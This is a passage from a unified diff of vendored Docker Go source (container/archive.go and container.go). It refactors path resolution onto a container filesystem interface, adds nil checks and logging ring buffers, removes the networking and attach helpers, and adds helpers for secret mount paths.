a/vendor/github.com/docker/docker/container/archive.go +++ b/vendor/github.com/docker/docker/container/archive.go @@ -1,12 +1,12 @@ -package container +package container // import "github.com/docker/docker/container" import ( "os" - "path/filepath" "github.com/docker/docker/api/types" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" ) // ResolvePath resolves the given path in the container to a resource on the @@ -14,18 +14,24 @@ import ( // the absolute path to the resource relative to the container's rootfs, and // an error if the path points to outside the container's rootfs. func (container *Container) ResolvePath(path string) (resolvedPath, absPath string, err error) { + if container.BaseFS == nil { + return "", "", errors.New("ResolvePath: BaseFS of container " + container.ID + " is unexpectedly nil") + } // Check if a drive letter supplied, it must be the system drive. No-op except on Windows - path, err = system.CheckSystemDriveAndRemoveDriveLetter(path) + path, err = system.CheckSystemDriveAndRemoveDriveLetter(path, container.BaseFS) if err != nil { return "", "", err } // Consider the given path as an absolute path in the container. - absPath = archive.PreserveTrailingDotOrSeparator(filepath.Join(string(filepath.Separator), path), path) + absPath = archive.PreserveTrailingDotOrSeparator( + container.BaseFS.Join(string(container.BaseFS.Separator()), path), + path, + container.BaseFS.Separator()) // Split the absPath into its Directory and Base components. We will // resolve the dir in the scope of the container then append the base. - dirPath, basePath := filepath.Split(absPath) + dirPath, basePath := container.BaseFS.Split(absPath) resolvedDirPath, err := container.GetResourcePath(dirPath) if err != nil { @@ -34,8 +40,7 @@ func (container *Container) ResolvePath(path string) (resolvedPath, absPath stri // resolvedDirPath will have been cleaned (no trailing path separators) so // we can manually join it with the base path element. - resolvedPath = resolvedDirPath + string(filepath.Separator) + basePath - + resolvedPath = resolvedDirPath + string(container.BaseFS.Separator()) + basePath return resolvedPath, absPath, nil } @@ -44,7 +49,12 @@ func (container *Container) ResolvePath(path string) (resolvedPath, absPath stri // resolved to a path on the host corresponding to the given absolute path // inside the container. func (container *Container) StatPath(resolvedPath, absPath string) (stat *types.ContainerPathStat, err error) { - lstat, err := os.Lstat(resolvedPath) + if container.BaseFS == nil { + return nil, errors.New("StatPath: BaseFS of container " + container.ID + " is unexpectedly nil") + } + driver := container.BaseFS + + lstat, err := driver.Lstat(resolvedPath) if err != nil { return nil, err } @@ -57,17 +67,17 @@ func (container *Container) StatPath(resolvedPath, absPath string) (stat *types. return nil, err } - linkTarget, err = filepath.Rel(container.BaseFS, hostPath) + linkTarget, err = driver.Rel(driver.Path(), hostPath) if err != nil { return nil, err } // Make it an absolute path. - linkTarget = filepath.Join(string(filepath.Separator), linkTarget) + linkTarget = driver.Join(string(driver.Separator()), linkTarget) } return &types.ContainerPathStat{ - Name: filepath.Base(absPath), + Name: driver.Base(absPath), Size: lstat.Size(), Mode: lstat.Mode(), Mtime: lstat.ModTime(), diff --git a/vendor/github.com/docker/docker/container/container.go b/vendor/github.com/docker/docker/container/container.go index fc4fe2717f..5f31d8df12 100644 --- a/vendor/github.com/docker/docker/container/container.go +++ b/vendor/github.com/docker/docker/container/container.go @@ -1,24 +1,22 @@ -package container +package container // import "github.com/docker/docker/container" import ( + "bytes" + "context" "encoding/json" "fmt" "io" - "net" "os" "path/filepath" - "strconv" + "runtime" "strings" "sync" "syscall" "time" - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" + "github.com/containerd/containerd/cio" containertypes "github.com/docker/docker/api/types/container" mounttypes "github.com/docker/docker/api/types/mount" - networktypes "github.com/docker/docker/api/types/network" swarmtypes "github.com/docker/docker/api/types/swarm" "github.com/docker/docker/container/stream" "github.com/docker/docker/daemon/exec" @@ -27,53 +25,43 @@ import ( "github.com/docker/docker/daemon/network" "github.com/docker/docker/image" "github.com/docker/docker/layer" - "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/pkg/promise" "github.com/docker/docker/pkg/signal" "github.com/docker/docker/pkg/symlink" + "github.com/docker/docker/pkg/system" "github.com/docker/docker/restartmanager" - "github.com/docker/docker/runconfig" - runconfigopts "github.com/docker/docker/runconfig/opts" "github.com/docker/docker/volume" - "github.com/docker/go-connections/nat" - "github.com/docker/libnetwork" - "github.com/docker/libnetwork/netlabel" - "github.com/docker/libnetwork/options" - "github.com/docker/libnetwork/types" + volumemounts "github.com/docker/docker/volume/mounts" + "github.com/docker/go-units" agentexec "github.com/docker/swarmkit/agent/exec" - "github.com/opencontainers/runc/libcontainer/label" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) const configFileName = "config.v2.json" -const ( - // DefaultStopTimeout is the timeout (in seconds) for the syscall signal used to stop a container. - DefaultStopTimeout = 10 -) +// ExitStatus provides exit reasons for a container. +type ExitStatus struct { + // The exit code with which the container exited. + ExitCode int -var ( - errInvalidEndpoint = fmt.Errorf("invalid endpoint while building port map info") - errInvalidNetwork = fmt.Errorf("invalid network settings while building port map info") -) + // Whether the container encountered an OOM. + OOMKilled bool -// DetachError is special error which returned in case of container detach. -type DetachError struct{} - -func (DetachError) Error() string { - return "detached from container" + // Time at which the container died + ExitedAt time.Time } -// CommonContainer holds the fields for a container which are -// applicable across all platforms supported by the daemon. -type CommonContainer struct { +// Container holds the structure defining a container object. +type Container struct { StreamConfig *stream.Config // embed for Container to support states directly. - *State `json:"State"` // Needed for Engine API version <= 1.11 - Root string `json:"-"` // Path to the "home" of the container, including metadata. - BaseFS string `json:"-"` // Path to the graphdriver mountpoint - RWLayer layer.RWLayer `json:"-"` + *State `json:"State"` // Needed for Engine API version <= 1.11 + Root string `json:"-"` // Path to the "home" of the container, including metadata. + BaseFS containerfs.ContainerFS `json:"-"` // interface containing graphdriver mount + RWLayer layer.RWLayer `json:"-"` ID string Created time.Time Managed bool @@ -85,37 +73,50 @@ type CommonContainer struct { LogPath string Name string Driver string + OS string // MountLabel contains the options for the 'mount' command MountLabel string ProcessLabel string RestartCount int HasBeenStartedBefore bool HasBeenManuallyStopped bool // used for unless-stopped restart policy - MountPoints map[string]*volume.MountPoint + MountPoints map[string]*volumemounts.MountPoint HostConfig *containertypes.HostConfig `json:"-"` // do not serialize the host config in the json, otherwise we'll make the container unportable ExecCommands *exec.Store `json:"-"` - SecretStore agentexec.SecretGetter `json:"-"` + DependencyStore agentexec.DependencyGetter `json:"-"` SecretReferences []*swarmtypes.SecretReference + ConfigReferences []*swarmtypes.ConfigReference // logDriver for closing LogDriver logger.Logger `json:"-"` LogCopier *logger.Copier `json:"-"` restartManager restartmanager.RestartManager attachContext *attachContext + + // Fields here are specific to Unix platforms + AppArmorProfile string + HostnamePath string + HostsPath string + ShmPath string + ResolvConfPath string + SeccompProfile string + NoNewPrivileges bool + + // Fields here are specific to Windows + NetworkSharedContainerID string `json:"-"` + SharedEndpointList []string `json:"-"` } // NewBaseContainer creates a new container with its // basic configuration. func NewBaseContainer(id, root string) *Container { return &Container{ - CommonContainer: CommonContainer{ - ID: id, - State: NewState(), - ExecCommands: exec.NewStore(), - Root: root, - MountPoints: make(map[string]*volume.MountPoint), - StreamConfig: stream.NewConfig(), - attachContext: &attachContext{}, - }, + ID: id, + State: NewState(), + ExecCommands: exec.NewStore(), + Root: root, + MountPoints: make(map[string]*volumemounts.MountPoint), + StreamConfig: stream.NewConfig(), + attachContext: &attachContext{}, } } @@ -139,41 +140,58 @@ func (container *Container) FromDisk() error { return err } - if err := label.ReserveLabel(container.ProcessLabel); err != nil { - return err + // Ensure the operating system is set if blank. Assume it is the OS of the + // host OS if not, to ensure containers created before multiple-OS + // support are migrated + if container.OS == "" { + container.OS = runtime.GOOS } + return container.readHostConfig() } -// ToDisk saves the container configuration on disk. -func (container *Container) ToDisk() error { +// toDisk saves the container configuration on disk and returns a deep copy. +func (container *Container) toDisk() (*Container, error) { + var ( + buf bytes.Buffer + deepCopy Container + ) pth, err := container.ConfigPath() if err != nil { - return err + return nil, err } - jsonSource, err := ioutils.NewAtomicFileWriter(pth, 0644) + // Save container settings + f, err := ioutils.NewAtomicFileWriter(pth, 0600) if err != nil { - return err + return nil, err } - defer jsonSource.Close() + defer f.Close() - enc := json.NewEncoder(jsonSource) + w := io.MultiWriter(&buf, f) + if err := json.NewEncoder(w).Encode(container); err != nil { + return nil, err + } - // Save container settings - if err := enc.Encode(container); err != nil { - return err + if err := json.NewDecoder(&buf).Decode(&deepCopy); err != nil { + return nil, err + } + deepCopy.HostConfig, err = container.WriteHostConfig() + if err != nil { + return nil, err } - return container.WriteHostConfig() + return &deepCopy, nil } -// ToDiskLocking saves the container configuration on disk in a thread safe way. -func (container *Container) ToDiskLocking() error { - container.Lock() - err := container.ToDisk() - container.Unlock() - return err +// CheckpointTo makes the Container's current state visible to queries, and persists state. +// Callers must hold a Container lock. +func (container *Container) CheckpointTo(store ViewDB) error { + deepCopy, err := container.toDisk() + if err != nil { + return err + } + return store.Save(deepCopy) } // readHostConfig reads the host configuration from disk for the container. @@ -205,39 +223,58 @@ func (container *Container) readHostConfig() error { return nil } -// WriteHostConfig saves the host configuration on disk for the container. -func (container *Container) WriteHostConfig() error { +// WriteHostConfig saves the host configuration on disk for the container, +// and returns a deep copy of the saved object. Callers must hold a Container lock. +func (container *Container) WriteHostConfig() (*containertypes.HostConfig, error) { + var ( + buf bytes.Buffer + deepCopy containertypes.HostConfig + ) + pth, err := container.HostConfigPath() if err != nil { - return err + return nil, err } f, err := ioutils.NewAtomicFileWriter(pth, 0644) if err != nil { - return err + return nil, err } defer f.Close() - return json.NewEncoder(f).Encode(&container.HostConfig) + w := io.MultiWriter(&buf, f) + if err := json.NewEncoder(w).Encode(&container.HostConfig); err != nil { + return nil, err + } + + if err := json.NewDecoder(&buf).Decode(&deepCopy); err != nil { + return nil, err + } + return &deepCopy, nil } // SetupWorkingDirectory sets up the container's working directory as set in container.Config.WorkingDir -func (container *Container) SetupWorkingDirectory(rootUID, rootGID int) error { +func (container *Container) SetupWorkingDirectory(rootIDs idtools.IDPair) error { + // TODO @jhowardmsft, @gupta-ak LCOW Support. This will need revisiting. + // We will need to do remote filesystem operations here. + if container.OS != runtime.GOOS { + return nil + } + if container.Config.WorkingDir == "" { return nil } container.Config.WorkingDir = filepath.Clean(container.Config.WorkingDir) - pth, err := container.GetResourcePath(container.Config.WorkingDir) if err != nil { return err } - if err := idtools.MkdirAllNewAs(pth, 0755, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChownNew(pth, 0755, rootIDs); err != nil { pthInfo, err2 := os.Stat(pth) if err2 == nil && pthInfo != nil && !pthInfo.IsDir() { - return fmt.Errorf("Cannot mkdir: %s is not a directory", container.Config.WorkingDir) + return errors.Errorf("Cannot mkdir: %s is not a directory", container.Config.WorkingDir) } return err @@ -260,17 +297,18 @@ func (container *Container) SetupWorkingDirectory(rootUID, rootGID int) error { // symlinking to a different path) between using this method and using the // path. See symlink.FollowSymlinkInScope for more details. func (container *Container) GetResourcePath(path string) (string, error) { + if container.BaseFS == nil { + return "", errors.New("GetResourcePath: BaseFS of container " + container.ID + " is unexpectedly nil") + } // IMPORTANT - These are paths on the OS where the daemon is running, hence // any filepath operations must be done in an OS agnostic way. - - cleanPath := cleanResourcePath(path) - r, e := symlink.FollowSymlinkInScope(filepath.Join(container.BaseFS, cleanPath), container.BaseFS) + r, e := container.BaseFS.ResolveScopedPath(path, false) // Log this here on the daemon side as there's otherwise no indication apart // from the error being propagated all the way back to the client. This makes // debugging significantly easier and clearly indicates the error comes from the daemon. if e != nil { - logrus.Errorf("Failed to FollowSymlinkInScope BaseFS %s cleanPath %s path %s %s\n", container.BaseFS, cleanPath, path, e) + logrus.Errorf("Failed to ResolveScopedPath BaseFS %s path %s %s\n", container.BaseFS.Path(), path, e) } return r, e } @@ -316,12 +354,13 @@ func (container *Container) CheckpointDir() string { } // StartLogger starts a new logger driver for the container. -func (container *Container) StartLogger(cfg containertypes.LogConfig) (logger.Logger, error) { - c, err := logger.GetLogDriver(cfg.Type) +func (container *Container) StartLogger() (logger.Logger, error) { + cfg := container.HostConfig.LogConfig + initDriver, err := logger.GetLogDriver(cfg.Type) if err != nil { - return nil, fmt.Errorf("Failed to get logging factory: %v", err) + return nil, errors.Wrap(err, "failed to get logging factory") } - ctx := logger.Context{ + info := logger.Info{ Config: cfg.Config, ContainerID: container.ID, ContainerName: container.Name, @@ -337,12 +376,30 @@ func (container *Container) StartLogger(cfg containertypes.LogConfig) (logger.Lo // Set logging file for "json-logger" if cfg.Type == jsonfilelog.Name { - ctx.LogPath, err = container.GetRootResourcePath(fmt.Sprintf("%s-json.log", container.ID)) + info.LogPath, err = container.GetRootResourcePath(fmt.Sprintf("%s-json.log", container.ID)) if err != nil { return nil, err } + + container.LogPath = info.LogPath } - return c(ctx) + + l, err := initDriver(info) + if err != nil { + return nil, err + } + + if containertypes.LogMode(cfg.Config["mode"]) == containertypes.LogModeNonBlock { + bufferSize := int64(-1) + if s, exists := cfg.Config["max-buffer-size"]; exists { + bufferSize, err = units.RAMInBytes(s) + if err != nil { + return nil, err + } + } + l = logger.NewRingLogger(l, info, bufferSize) + } + return l, nil } // GetProcessLabel returns the process label for the container. @@ -366,185 +423,6 @@ func (container *Container) GetExecIDs() []string { return container.ExecCommands.List() } -// Attach connects to the container's TTY, delegating to standard -// streams or websockets depending on the configuration. -func (container *Container) Attach(stdin io.ReadCloser, stdout io.Writer, stderr io.Writer, keys []byte) chan error { - ctx := container.InitAttachContext() - return AttachStreams(ctx, container.StreamConfig, container.Config.OpenStdin, container.Config.StdinOnce, container.Config.Tty, stdin, stdout, stderr, keys) -} - -// AttachStreams connects streams to a TTY. -// Used by exec too. Should this move somewhere else? -func AttachStreams(ctx context.Context, streamConfig *stream.Config, openStdin, stdinOnce, tty bool, stdin io.ReadCloser, stdout io.Writer, stderr io.Writer, keys []byte) chan error { - var ( - cStdout, cStderr io.ReadCloser - cStdin io.WriteCloser - wg sync.WaitGroup - errors = make(chan error, 3) - ) - - if stdin != nil && openStdin { - cStdin = streamConfig.StdinPipe() - wg.Add(1) - } - - if stdout != nil { - cStdout = streamConfig.StdoutPipe() - wg.Add(1) - } - - if stderr != nil { - cStderr = streamConfig.StderrPipe() - wg.Add(1) - } - - // Connect stdin of container to the http conn. - go func() { - if stdin == nil || !openStdin { - return - } - logrus.Debug("attach: stdin: begin") - - var err error - if tty { - _, err = copyEscapable(cStdin, stdin, keys) - } else { - _, err = io.Copy(cStdin, stdin) - } - if err == io.ErrClosedPipe { - err = nil - } - if err != nil { - logrus.Errorf("attach: stdin: %s", err) - errors <- err - } - if stdinOnce && !tty { - cStdin.Close() - } else { - // No matter what, when stdin is closed (io.Copy unblock), close stdout and stderr - if cStdout != nil { - cStdout.Close() - } - if cStderr != nil { - cStderr.Close() - } - } - logrus.Debug("attach: stdin: end") - wg.Done() - }() - - attachStream := func(name string, stream io.Writer, streamPipe io.ReadCloser) { - if stream == nil { - return - } - - logrus.Debugf("attach: %s: begin", name) - _, err := io.Copy(stream, streamPipe) - if err == io.ErrClosedPipe { - err = nil - } - if err != nil { - logrus.Errorf("attach: %s: %v", name, err) - errors <- err - } - // Make sure stdin gets closed - if stdin != nil { - stdin.Close() - } - streamPipe.Close() - logrus.Debugf("attach: %s: end", name) - wg.Done() - } - - go attachStream("stdout", stdout, cStdout) - go attachStream("stderr", stderr, cStderr) - - return promise.Go(func() error { - done := make(chan struct{}) - go func() { - wg.Wait() - close(done) - }() - select { - case <-done: - case <-ctx.Done(): - // close all pipes - if cStdin != nil { - cStdin.Close() - } - if cStdout != nil { - cStdout.Close() - } - if cStderr != nil { - cStderr.Close() - } - <-done - } - close(errors) - for err := range errors { - if err != nil { - return err - } - } - return nil - }) -} - -// Code c/c from io.Copy() modified to handle escape sequence -func copyEscapable(dst io.Writer, src io.ReadCloser, keys []byte) (written int64, err error) { - if len(keys) == 0 { - // Default keys : ctrl-p ctrl-q - keys = []byte{16, 17} - } - buf := make([]byte, 32*1024) - for { - nr, er := src.Read(buf) - if nr > 0 { - // ---- Docker addition - preservBuf := []byte{} - for i, key := range keys { - preservBuf = append(preservBuf, buf[0:nr]...) - if nr != 1 || buf[0] != key { - break - } - if i == len(keys)-1 { - src.Close() - return 0, DetachError{} - } - nr, er = src.Read(buf) - } - var nw int - var ew error - if len(preservBuf) > 0 { - nw, ew = dst.Write(preservBuf) - nr = len(preservBuf) - } else { - // ---- End of docker - nw, ew = dst.Write(buf[0:nr]) - } - if nw > 0 { - written += int64(nw) - } - if ew != nil { - err = ew - break - } - if nr != nw { - err = io.ErrShortWrite - break - } - } - if er == io.EOF { - break - } - if er != nil { - err = er - break - } - } - return written, err -} - // ShouldRestart decides whether the daemon should restart the container or not. // This is based on the container's restart policy. func (container *Container) ShouldRestart() bool { @@ -554,14 +432,19 @@ func (container *Container) ShouldRestart() bool { // AddMountPointWithVolume adds a new mount point configured with a volume to the container. func (container *Container) AddMountPointWithVolume(destination string, vol volume.Volume, rw bool) { - container.MountPoints[destination] = &volume.MountPoint{ + operatingSystem := container.OS + if operatingSystem == "" { + operatingSystem = runtime.GOOS + } + volumeParser := volumemounts.NewParser(operatingSystem) + container.MountPoints[destination] = &volumemounts.MountPoint{ Type: mounttypes.TypeVolume, Name: vol.Name(), Driver: vol.DriverName(), Destination: destination, RW: rw, Volume: vol, - CopyData: volume.DefaultCopyMode, + CopyData: volumeParser.DefaultCopyMode(), } } @@ -569,21 +452,20 @@ func (container *Container) AddMountPointWithVolume(destination string, vol volu func (container *Container) UnmountVolumes(volumeEventLog func(name, action string, attributes map[string]string)) error { var errors []string for _, volumeMount := range container.MountPoints { - // Check if the mounpoint has an ID, this is currently the best way to tell if it's actually mounted - // TODO(cpuguyh83): there should be a better way to handle this - if volumeMount.Volume != nil && volumeMount.ID != "" { - if err := volumeMount.Volume.Unmount(volumeMount.ID); err != nil { - errors = append(errors, err.Error()) - continue - } - volumeMount.ID = "" + if volumeMount.Volume == nil { + continue + } - attributes := map[string]string{ - "driver": volumeMount.Volume.DriverName(), - "container": container.ID, - } - volumeEventLog(volumeMount.Volume.Name(), "unmount", attributes) + if err := volumeMount.Cleanup(); err != nil { + errors = append(errors, err.Error()) + continue } + + attributes := map[string]string{ + "driver": volumeMount.Volume.DriverName(), + "container": container.ID, + } + volumeEventLog(volumeMount.Volume.Name(), "unmount", attributes) } if len(errors) > 0 { return fmt.Errorf("error while unmounting volumes for container %s: %s", container.ID, strings.Join(errors, "; ")) @@ -641,337 +523,6 @@ func (container *Container) InitDNSHostConfig() { } } -// GetEndpointInNetwork returns the container's endpoint to the provided network. -func (container *Container) GetEndpointInNetwork(n libnetwork.Network) (libnetwork.Endpoint, error) { - endpointName := strings.TrimPrefix(container.Name, "/") - return n.EndpointByName(endpointName) -} - -func (container *Container) buildPortMapInfo(ep libnetwork.Endpoint) error { - if ep == nil { - return errInvalidEndpoint - } - - networkSettings := container.NetworkSettings - if networkSettings == nil { - return errInvalidNetwork - } - - if len(networkSettings.Ports) == 0 { - pm, err := getEndpointPortMapInfo(ep) - if err != nil { - return err - } - networkSettings.Ports = pm - } - return nil -} - -func getEndpointPortMapInfo(ep libnetwork.Endpoint) (nat.PortMap, error) { - pm := nat.PortMap{} - driverInfo, err := ep.DriverInfo() - if err != nil { - return pm, err - } - - if driverInfo == nil { - // It is not an error for epInfo to be nil - return pm, nil - } - - if expData, ok := driverInfo[netlabel.ExposedPorts]; ok { - if exposedPorts, ok := expData.([]types.TransportPort); ok { - for _, tp := range exposedPorts { - natPort, err := nat.NewPort(tp.Proto.String(), strconv.Itoa(int(tp.Port))) - if err != nil { - return pm, fmt.Errorf("Error parsing Port value(%v):%v", tp.Port, err) - } - pm[natPort] = nil - } - } - } - - mapData, ok := driverInfo[netlabel.PortMap] - if !ok { - return pm, nil - } - - if portMapping, ok := mapData.([]types.PortBinding); ok { - for _, pp := range portMapping { - natPort, err := nat.NewPort(pp.Proto.String(), strconv.Itoa(int(pp.Port))) - if err != nil { - return pm, err - } - natBndg := nat.PortBinding{HostIP: pp.HostIP.String(), HostPort: strconv.Itoa(int(pp.HostPort))} - pm[natPort] = append(pm[natPort], natBndg) - } - } - - return pm, nil -} - -// GetSandboxPortMapInfo retrieves the current port-mapping programmed for the given sandbox -func GetSandboxPortMapInfo(sb libnetwork.Sandbox) nat.PortMap { - pm := nat.PortMap{} - if sb == nil { - return pm - } - - for _, ep := range sb.Endpoints() { - pm, _ = getEndpointPortMapInfo(ep) - if len(pm) > 0 { - break - } - } - return pm -} - -// BuildEndpointInfo sets endpoint-related fields on container.NetworkSettings based on the provided network and endpoint. -func (container *Container) BuildEndpointInfo(n libnetwork.Network, ep libnetwork.Endpoint) error { - if ep == nil { - return errInvalidEndpoint - } - - networkSettings := container.NetworkSettings - if networkSettings == nil { - return errInvalidNetwork - } - - epInfo := ep.Info() - if epInfo == nil { - // It is not an error to get an empty endpoint info - return nil - } - - if _, ok := networkSettings.Networks[n.Name()]; !ok { - networkSettings.Networks[n.Name()] = &network.EndpointSettings{ - EndpointSettings: &networktypes.EndpointSettings{}, - } - } - networkSettings.Networks[n.Name()].NetworkID = n.ID() - networkSettings.Networks[n.Name()].EndpointID = ep.ID() - - iface := epInfo.Iface() - if iface == nil { - return nil - } - - if iface.MacAddress() != nil { - networkSettings.Networks[n.Name()].MacAddress = iface.MacAddress().String() - } - - if iface.Address() != nil { - ones, _ := iface.Address().Mask.Size() - networkSettings.Networks[n.Name()].IPAddress = iface.Address().IP.String() - networkSettings.Networks[n.Name()].IPPrefixLen = ones - } - - if iface.AddressIPv6() != nil && iface.AddressIPv6().IP.To16() != nil { - onesv6, _ := iface.AddressIPv6().Mask.Size() - networkSettings.Networks[n.Name()].GlobalIPv6Address = iface.AddressIPv6().IP.String() - networkSettings.Networks[n.Name()].GlobalIPv6PrefixLen = onesv6 - } - - return nil -} - -// UpdateJoinInfo updates network settings when container joins network n with endpoint ep. -func (container *Container) UpdateJoinInfo(n libnetwork.Network, ep libnetwork.Endpoint) error { - if err := container.buildPortMapInfo(ep); err != nil { - return err - } - - epInfo := ep.Info() - if epInfo == nil { - // It is not an error to get an empty endpoint info - return nil - } - if epInfo.Gateway() != nil { - container.NetworkSettings.Networks[n.Name()].Gateway = epInfo.Gateway().String() - } - if epInfo.GatewayIPv6().To16() != nil { - container.NetworkSettings.Networks[n.Name()].IPv6Gateway = epInfo.GatewayIPv6().String() - } - - return nil -} - -// UpdateSandboxNetworkSettings updates the sandbox ID and Key. -func (container *Container) UpdateSandboxNetworkSettings(sb libnetwork.Sandbox) error { - container.NetworkSettings.SandboxID = sb.ID() - container.NetworkSettings.SandboxKey = sb.Key() - return nil -} - -// BuildJoinOptions builds endpoint Join options from a given network. -func (container *Container) BuildJoinOptions(n libnetwork.Network) ([]libnetwork.EndpointOption, error) { - var joinOptions []libnetwork.EndpointOption - if epConfig, ok := container.NetworkSettings.Networks[n.Name()]; ok { - for _, str := range epConfig.Links { - name, alias, err := runconfigopts.ParseLink(str) - if err != nil { - return nil, err - } - joinOptions = append(joinOptions, libnetwork.CreateOptionAlias(name, alias)) - } - } - return joinOptions, nil -} - -// BuildCreateEndpointOptions builds endpoint options from a given network. -func (container *Container) BuildCreateEndpointOptions(n libnetwork.Network, epConfig *networktypes.EndpointSettings, sb libnetwork.Sandbox, daemonDNS []string) ([]libnetwork.EndpointOption, error) { - var ( - bindings = make(nat.PortMap) - pbList []types.PortBinding - exposeList []types.TransportPort - createOptions []libnetwork.EndpointOption - ) - - defaultNetName := runconfig.DefaultDaemonNetworkMode().NetworkName() - - if (!container.EnableServiceDiscoveryOnDefaultNetwork() && n.Name() == defaultNetName) || - container.NetworkSettings.IsAnonymousEndpoint { - createOptions = append(createOptions, libnetwork.CreateOptionAnonymous()) - } - - if epConfig != nil { - ipam := epConfig.IPAMConfig - if ipam != nil && (ipam.IPv4Address != "" || ipam.IPv6Address != "" || len(ipam.LinkLocalIPs) > 0) { - var ipList []net.IP - for _, ips := range ipam.LinkLocalIPs { - if ip := net.ParseIP(ips); ip != nil { - ipList = append(ipList, ip) - } - } - createOptions = append(createOptions, - libnetwork.CreateOptionIpam(net.ParseIP(ipam.IPv4Address), net.ParseIP(ipam.IPv6Address), ipList, nil)) - } - - for _, alias := range epConfig.Aliases { - createOptions = append(createOptions, libnetwork.CreateOptionMyAlias(alias)) - } - } - - if container.NetworkSettings.Service != nil { - svcCfg := container.NetworkSettings.Service - - var vip string - if svcCfg.VirtualAddresses[n.ID()] != nil { - vip = svcCfg.VirtualAddresses[n.ID()].IPv4 - } - - var portConfigs []*libnetwork.PortConfig - for _, portConfig := range svcCfg.ExposedPorts { - portConfigs = append(portConfigs, &libnetwork.PortConfig{ - Name: portConfig.Name, - Protocol: libnetwork.PortConfig_Protocol(portConfig.Protocol), - TargetPort: portConfig.TargetPort, - PublishedPort: portConfig.PublishedPort, - }) - } - - createOptions = append(createOptions, libnetwork.CreateOptionService(svcCfg.Name, svcCfg.ID, net.ParseIP(vip), portConfigs, svcCfg.Aliases[n.ID()])) - } - - if !containertypes.NetworkMode(n.Name()).IsUserDefined() { - createOptions = append(createOptions, libnetwork.CreateOptionDisableResolution()) - } - - // configs that are applicable only for the endpoint in the network - // to which container was connected to on docker run. - // Ideally all these network-specific endpoint configurations must be moved under - // container.NetworkSettings.Networks[n.Name()] - if n.Name() == container.HostConfig.NetworkMode.NetworkName() || - (n.Name() == defaultNetName && container.HostConfig.NetworkMode.IsDefault()) { - if container.Config.MacAddress != "" { - mac, err := net.ParseMAC(container.Config.MacAddress) - if err != nil { - return nil, err - } - - genericOption := options.Generic{ - netlabel.MacAddress: mac, - } - - createOptions = append(createOptions, libnetwork.EndpointOptionGeneric(genericOption)) - } - } - - // Port-mapping rules belong to the container & applicable only to non-internal networks - portmaps := GetSandboxPortMapInfo(sb) - if n.Info().Internal() || len(portmaps) > 0 { - return createOptions, nil - } - - if container.HostConfig.PortBindings != nil { - for p, b := range container.HostConfig.PortBindings { - bindings[p] = []nat.PortBinding{} - for _, bb := range b { - bindings[p] = append(bindings[p], nat.PortBinding{ - HostIP: bb.HostIP, - HostPort: bb.HostPort, - }) - } - } - } - - portSpecs := container.Config.ExposedPorts - ports := make([]nat.Port, len(portSpecs)) - var i int - for p := range portSpecs { - ports[i] = p - i++ - } - nat.SortPortMap(ports, bindings) - for _, port := range ports { - expose := types.TransportPort{} - expose.Proto = types.ParseProtocol(port.Proto()) - expose.Port = uint16(port.Int()) - exposeList = append(exposeList, expose) - - pb := types.PortBinding{Port: expose.Port, Proto: expose.Proto} - binding := bindings[port] - for i := 0; i < len(binding); i++ { - pbCopy := pb.GetCopy() - newP, err := nat.NewPort(nat.SplitProtoPort(binding[i].HostPort)) - var portStart, portEnd int - if err == nil { - portStart, portEnd, err = newP.Range() - } - if err != nil { - return nil, fmt.Errorf("Error parsing HostPort value(%s):%v", binding[i].HostPort, err) - } - pbCopy.HostPort = uint16(portStart) - pbCopy.HostPortEnd = uint16(portEnd) - pbCopy.HostIP = net.ParseIP(binding[i].HostIP) - pbList = append(pbList, pbCopy) - } - - if container.HostConfig.PublishAllPorts && len(binding) == 0 { - pbList = append(pbList, pb) - } - } - - var dns []string - - if len(container.HostConfig.DNS) > 0 { - dns = container.HostConfig.DNS - } else if len(daemonDNS) > 0 { - dns = daemonDNS - } - - if len(dns) > 0 { - createOptions = append(createOptions, - libnetwork.CreateOptionDNS(dns)) - } - - createOptions = append(createOptions, - libnetwork.CreateOptionPortMapping(pbList), - libnetwork.CreateOptionExposedPorts(exposeList)) - - return createOptions, nil -} - // UpdateMonitor updates monitor configure for running container func (container *Container) UpdateMonitor(restartPolicy containertypes.RestartPolicy) { type policySetter interface { @@ -1044,9 +595,9 @@ func (container *Container) startLogging() error { return nil // do not start logging routines } - l, err := container.StartLogger(container.HostConfig.LogConfig) + l, err := container.StartLogger() if err != nil { - return fmt.Errorf("Failed to initialize logging driver: %v", err) + return fmt.Errorf("failed to initialize logging driver: %v", err) } copier := logger.NewCopier(map[string]io.Reader{"stdout": container.StdoutPipe(), "stderr": container.StderrPipe()}, l) @@ -1054,11 +605,6 @@ func (container *Container) startLogging() error { copier.Run() container.LogDriver = l - // set LogPath field only for json-file logdriver - if jl, ok := l.(*jsonfilelog.JSONFileLogger); ok { - container.LogPath = jl.LogPath() - } - return nil } @@ -1083,10 +629,10 @@ func (container *Container) CloseStreams() error { } // InitializeStdio is called by libcontainerd to connect the stdio. -func (container *Container) InitializeStdio(iop libcontainerd.IOPipe) error { +func (container *Container) InitializeStdio(iop *cio.DirectIO) (cio.IO, error) { if err := container.startLogging(); err != nil { container.Reset(false) - return err + return nil, err } container.StreamConfig.CopyToPipe(iop) @@ -1099,5 +645,76 @@ func (container *Container) InitializeStdio(iop libcontainerd.IOPipe) error { } } - return nil + return &rio{IO: iop, sc: container.StreamConfig}, nil +} + +// MountsResourcePath returns the path where mounts are stored for the given mount +func (container *Container) MountsResourcePath(mount string) (string, error) { + return container.GetRootResourcePath(filepath.Join("mounts", mount)) +} + +// SecretMountPath returns the path of the secret mount for the container +func (container *Container) SecretMountPath() (string, error) { + return container.MountsResourcePath("secrets") +} + +// SecretFilePath returns the path to the location of a secret on the host. +func (container *Container) SecretFilePath(secretRef swarmtypes.SecretReference) (string, error) { + secrets, err := container.SecretMountPath() + if err != nil { + return "", err + } + return filepath.Join(secrets, secretRef.SecretID), nil +} + +func getSecretTargetPath(r *swarmtypes.SecretReference) string { + if filepath.IsAbs(r.File.Name) { + return r.File.Name + } + + return filepath.Join(containerSecretMountPath, r.File.Name) +} + +// CreateDaemonEnvironment creates a new environment variable slice for this container. +func (container *Container) CreateDaemonEnvironment(tty bool, linkedEnv []string) []string { + // Setup environment + os := container.OS + if os == "" { + os = runtime.GOOS + } + env := []string{} + if runtime.GOOS != "windows" || (runtime.GOOS == 